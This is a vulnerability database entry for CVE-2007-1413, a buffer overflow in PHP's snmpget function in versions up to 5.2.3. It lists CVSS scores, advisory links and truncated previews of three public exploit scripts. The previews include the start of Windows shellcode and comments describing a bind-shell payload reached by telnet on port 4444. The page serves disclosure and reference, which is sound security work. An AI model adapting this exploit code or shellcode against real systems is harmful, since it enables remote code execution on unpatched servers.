Published: 12/03/2007 Updated: 11/10/2017

CVSS v2 Base Score: 7.5 | Impact Score: 6.4 | Exploitability Score: 10

VMScore: 765

Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

Buffer overflow in the snmpget function in the snmp extension in PHP 5.2.3 and previous versions, including PHP 4.4.6 and probably other PHP 4 versions, allows context-dependent malicious users to execute arbitrary code via a long value in the third argument (object id).

Vulnerable Product	Search on Vulmon	Subscribe to Product
php php 4.4.6
php php

<?php /* Inphex reference ->milw0rmcom/exploits/4204 317 Bytes , Windows Command Shell Bind TCP Inline , Architecture x86 , Windows TinyXP - vm GET /scriptphp HTTP/11\n telnet 192168232 4444 Microsoft Windows XP [Version 512600] (C) Copyright 1985-2001 Microsoft Corp C:\apache> */ if (!extension_loaded("snmp")) { die("s ...

<?php // PHP 446 snmpget() object id local buffer overflow poc exploit // by rgod // site: retrogodaltervistaorg // win xp sp2 version // to be launched form the cli if (!extension_loaded("snmp")){ die("you need the snmp extension loaded"); } $____scode= "\xeb\x1b" "\x5b" "\x31\xc0" "\x50" "\x31\xc0" "\x88\x43\x59" "\x53" ...

<?php //PHP <= 523 snmpget() object id local Buffer Overflow eip overwrite exploit //bug discovered by rgod //Original advisory: retrogodaltervistaorg/php_446_snmpget_local_bofhtml //[quote="rgod"]more than 256 chars result in simple eip overwrite[/quote] //right! so here it is an exploit using eip overwrite //author: shinnai // ...

CWE-119 http://www.securityfocus.com/bid/22893 http://secunia.com/advisories/24440 http://retrogod.altervista.org/php_446_snmpget_local_bof.html https://exchange.xforce.ibmcloud.com/vulnerabilities/35517 https://www.exploit-db.com/exploits/4204 https://www.exploit-db.com/exploits/3439 https://nvd.nist.gov https://www.exploit-db.com/exploits/4274/

CVE-2007-1413

Vulnerability Summary

Exploits

References

Vulmon Search

About

Products

Connect